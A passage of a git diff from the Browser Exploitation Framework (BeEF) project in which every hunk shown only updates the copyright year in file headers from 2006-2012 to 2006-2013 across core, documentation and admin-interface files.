+++ b/core/main/rest/handlers/hookedbrowsers.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/rest/handlers/logs.rb b/core/main/rest/handlers/logs.rb
index 6d7d4b109..2da74154f 100644
--- a/core/main/rest/handlers/logs.rb
+++ b/core/main/rest/handlers/logs.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/rest/handlers/modules.rb b/core/main/rest/handlers/modules.rb
index 44384137e..691678d0f 100644
--- a/core/main/rest/handlers/modules.rb
+++ b/core/main/rest/handlers/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/router/api.rb b/core/main/router/api.rb
index 3d2bc78d5..4610172bf 100644
--- a/core/main/router/api.rb
+++ b/core/main/router/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index 958d29117..10e5d452c 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/main/server.rb b/core/main/server.rb
index c0ddaee47..c7e3ab898 100644
--- a/core/main/server.rb
+++ b/core/main/server.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/module.rb b/core/module.rb
index 4856008ef..a711f5bcf 100644
--- a/core/module.rb
+++ b/core/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/modules.rb b/core/modules.rb
index 5dff69520..a3f56fb2f 100644
--- a/core/modules.rb
+++ b/core/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby.rb b/core/ruby.rb
index b1d2f53f7..7b3b546d2 100644
--- a/core/ruby.rb
+++ b/core/ruby.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby/hash.rb b/core/ruby/hash.rb
index f24b3f30d..b2b4067b7 100644
--- a/core/ruby/hash.rb
+++ b/core/ruby/hash.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby/module.rb b/core/ruby/module.rb
index 3eb170caa..387005201 100644
--- a/core/ruby/module.rb
+++ b/core/ruby/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby/object.rb b/core/ruby/object.rb
index 98de6419b..12b68a50a 100644
--- a/core/ruby/object.rb
+++ b/core/ruby/object.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby/patches/dm-do-adapter/adapter.rb b/core/ruby/patches/dm-do-adapter/adapter.rb
index 01117ab86..6a121db00 100644
--- a/core/ruby/patches/dm-do-adapter/adapter.rb
+++ b/core/ruby/patches/dm-do-adapter/adapter.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby/print.rb b/core/ruby/print.rb
index 417fbcdf1..bdeb78361 100644
--- a/core/ruby/print.rb
+++ b/core/ruby/print.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby/security.rb b/core/ruby/security.rb
index 34baa2813..5498c8e3d 100644
--- a/core/ruby/security.rb
+++ b/core/ruby/security.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/ruby/string.rb b/core/ruby/string.rb
index 7a83138d1..a7296b48d 100644
--- a/core/ruby/string.rb
+++ b/core/ruby/string.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/core/settings.rb b/core/settings.rb
index 2230b7612..77283ea11 100644
--- a/core/settings.rb
+++ b/core/settings.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/docs/COPYING b/docs/COPYING
index a6eac6ac6..4e452edc7 100644
--- a/docs/COPYING
+++ b/docs/COPYING
@@ -2,7 +2,7 @@ COPYING -- Describes the terms under which the Browser Exploitation
 Framework (BeEF) is distributed. A copy of the GNU General Public License
 (GPL) is appended to this file.
 
-BeEF (Browser Exploitation Framework) is (C) 2006-2012 Wade Alcorn.
+BeEF (Browser Exploitation Framework) is (C) 2006-2013 Wade Alcorn.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
diff --git a/docs/boilerplate b/docs/boilerplate
index d76a93909..ab89d5f8c 100644
--- a/docs/boilerplate
+++ b/docs/boilerplate
@@ -1,3 +1,3 @@
-Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 Browser Exploitation Framework (BeEF) - http://beefproject.com
 See the file 'doc/COPYING' for copying permission
\ No newline at end of file
diff --git a/extensions/admin_ui/api/command.rb b/extensions/admin_ui/api/command.rb
index c18dd991d..dfee9fb39 100644
--- a/extensions/admin_ui/api/command.rb
+++ b/extensions/admin_ui/api/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb
index e524f4caf..12358426f 100644
--- a/extensions/admin_ui/api/handler.rb
+++ b/extensions/admin_ui/api/handler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/classes/httpcontroller.rb b/extensions/admin_ui/classes/httpcontroller.rb
index 68948a782..da9cd9dbf 100644
--- a/extensions/admin_ui/classes/httpcontroller.rb
+++ b/extensions/admin_ui/classes/httpcontroller.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/classes/session.rb b/extensions/admin_ui/classes/session.rb
index 0d6990dc1..b837b4628 100644
--- a/extensions/admin_ui/classes/session.rb
+++ b/extensions/admin_ui/classes/session.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/config.yaml b/extensions/admin_ui/config.yaml
index 9259abf81..82968bd9d 100644
--- a/extensions/admin_ui/config.yaml
+++ b/extensions/admin_ui/config.yaml
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/constants/agents.rb b/extensions/admin_ui/constants/agents.rb
index cd7d99f88..f8e6b9487 100644
--- a/extensions/admin_ui/constants/agents.rb
+++ b/extensions/admin_ui/constants/agents.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/constants/icons.rb b/extensions/admin_ui/constants/icons.rb
index 53bc83e79..c303c268f 100644
--- a/extensions/admin_ui/constants/icons.rb
+++ b/extensions/admin_ui/constants/icons.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/controllers/authentication/authentication.rb b/extensions/admin_ui/controllers/authentication/authentication.rb
index 78a91e46a..db7af2dbe 100644
--- a/extensions/admin_ui/controllers/authentication/authentication.rb
+++ b/extensions/admin_ui/controllers/authentication/authentication.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/controllers/authentication/index.html b/extensions/admin_ui/controllers/authentication/index.html
index c2c8e3ef9..95bba39af 100644
--- a/extensions/admin_ui/controllers/authentication/index.html
+++ b/extensions/admin_ui/controllers/authentication/index.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/admin_ui/controllers/logs/logs.rb b/extensions/admin_ui/controllers/logs/logs.rb
index e384dd620..2f90dfb0d 100644
--- a/extensions/admin_ui/controllers/logs/logs.rb
+++ b/extensions/admin_ui/controllers/logs/logs.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb
index 74643feea..e4857e87a 100644
--- a/extensions/admin_ui/controllers/modules/modules.rb
+++ b/extensions/admin_ui/controllers/modules/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/controllers/panel/index.html b/extensions/admin_ui/controllers/panel/index.html
index 4091f664d..dcbed16a4 100644
--- a/extensions/admin_ui/controllers/panel/index.html
+++ b/extensions/admin_ui/controllers/panel/index.html
@@ -1,5 +1,5 @@
 <!--
-    Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
     Browser Exploitation Framework (BeEF) - http://beefproject.com
     See the file 'doc/COPYING' for copying permission
 -->
diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb
index e2fe61f07..72c2c8bc1 100644
--- a/extensions/admin_ui/controllers/panel/panel.rb
+++ b/extensions/admin_ui/controllers/panel/panel.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/extension.rb b/extensions/admin_ui/extension.rb
index 1ce500b0e..415afc127 100644
--- a/extensions/admin_ui/extension.rb
+++ b/extensions/admin_ui/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/handlers/ui.rb b/extensions/admin_ui/handlers/ui.rb
index 8a375aa52..217e9204b 100644
--- a/extensions/admin_ui/handlers/ui.rb
+++ b/extensions/admin_ui/handlers/ui.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
diff --git a/extensions/admin_ui/media/css/base.css b/extensions/admin_ui/media/css/base.css
index 516acd487..037945ad1 100644
--- a/extensions/admin_ui/media/css/base.css
+++ b/extensions/admin_ui/media/css/base.css
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/admin_ui/media/css/ext-all.css b/extensions/admin_ui/media/css/ext-all.css
index 230fbd0ae..8dfba6470 100644
--- a/extensions/admin_ui/media/css/ext-all.css
+++ b/extensions/admin_ui/media/css/ext-all.css
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/admin_ui/media/css/wterm.css b/extensions/admin_ui/media/css/wterm.css
index 45217e860..d07e886ef 100644
--- a/extensions/admin_ui/media/css/wterm.css
+++ b/extensions/admin_ui/media/css/wterm.css
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/admin_ui/media/javascript/esapi/Class.create.js b/extensions/admin_ui/media/javascript/esapi/Class.create.js
index 81fc6ad5e..39115c00b 100644
--- a/extensions/admin_ui/media/javascript/esapi/Class.create.js
+++ b/extensions/admin_ui/media/javascript/esapi/Class.create.js
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
  * Browser Exploitation Framework (BeEF) - http://beefproject.com
  * See the file 'doc/COPYING' for copying permission
  */
diff --git a/extensions/admin_ui/media/javascript/ext-beef.js b/extensions/admin_ui/media/javascript/ext-beef.js
index 2f5715ff5..568a27412 100644
--- a/extensions/admin_ui/media/javascript/ext-beef.js
+++ b/extensions/admin_ui/media/javascript/ext-beef.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/authentication.js b/extensions/admin_ui/media/javascript/ui/authentication.js
index 7e5646342..596772e38 100644
--- a/extensions/admin_ui/media/javascript/ui/authentication.js
+++ b/extensions/admin_ui/media/javascript/ui/authentication.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
index c0af84dce..570448307 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js b/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js
index 901bbc29b..dd4135e5c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/DistributedEngine.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js b/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js
index c8ef18a0a..84565b65f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/HackVertorTab.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js b/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js
index 093d137df..2b87e4918 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/HooksTab.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/Logout.js b/extensions/admin_ui/media/javascript/ui/panel/Logout.js
index 13c9c5afe..9a2f66a4f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/Logout.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/Logout.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
index 45fe5811e..0620f95fb 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js b/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js
index c975ea08c..b0a48c06b 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/PanelStatusBar.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
index 294746856..91a33acd4 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
index 0c1abb65c..e420dc430 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
index 54f7e3056..238b59746 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTab.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js b/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js
index 901aaf8b4..f7ceee27c 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombieTabs.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index 1aeb3e6e2..6b1c8587a 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/common.js b/extensions/admin_ui/media/javascript/ui/panel/common.js
index 8e5f15a71..5fc4e536a 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/common.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/common.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
index 1a03cf59a..3ae049d09 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
index e80c39d42..072fb143f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
index 6f8b2f77f..523329acd 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
diff --git a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
index cd57346b2..8d39aaafe 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
